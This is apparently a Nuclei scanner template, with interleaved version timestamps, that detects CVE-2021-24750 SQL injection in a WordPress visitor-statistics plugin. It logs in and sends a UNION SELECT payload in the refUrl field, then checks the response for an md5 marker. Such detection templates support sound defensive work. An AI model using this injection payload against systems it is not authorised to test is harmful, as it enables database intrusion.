2022-01-23 05:17:20 +00:00
id : CVE-2021-24750
info :
2022-06-25 07:14:58 +00:00
name : WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
2022-01-23 05:17:20 +00:00
author : cckuakilong
severity : high
2022-06-25 07:14:58 +00:00
description : WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.
2022-01-23 05:17:20 +00:00
reference :
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
2022-05-17 09:18:12 +00:00
- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
- https://plugins.trac.wordpress.org/changeset/2622268
2022-06-25 07:14:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
2022-01-23 05:17:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2021-24750
cwe-id : CWE-89
2023-08-31 11:46:18 +00:00
epss-score : 0.00791
2023-11-07 14:54:31 +00:00
epss-percentile : 0.79651
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : wp_visitor_statistics_\(real_time_traffic\)_project
product : wp_visitor_statistics_\(real_time_traffic\)
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin
2022-06-30 03:50:00 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2022-01-23 05:17:20 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
2022-01-23 09:21:25 +00:00
Origin : {{RootURL}}
2022-01-23 05:17:20 +00:00
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-06-30 03:50:00 +00:00
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
2022-01-23 05:17:20 +00:00
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-01-23 05:17:20 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-06-30 03:50:00 +00:00
- '{{md5({{num}})}}'
2022-01-23 05:17:20 +00:00
- type : status
status :
2022-01-23 09:08:12 +00:00
- 200
2023-11-07 17:58:22 +00:00
# digest: 4b0a00483046022100ddec8a783ca99a1c71eb99d135c1705eb9c6d341c6672ffb5e621baf8129509b02210097c29c4de8d9a3d86606a6e1f87fdee38f9a3040c1fd6b07799e93f7bcc0b2ec:922c64590222798bb761d5b6d8e72950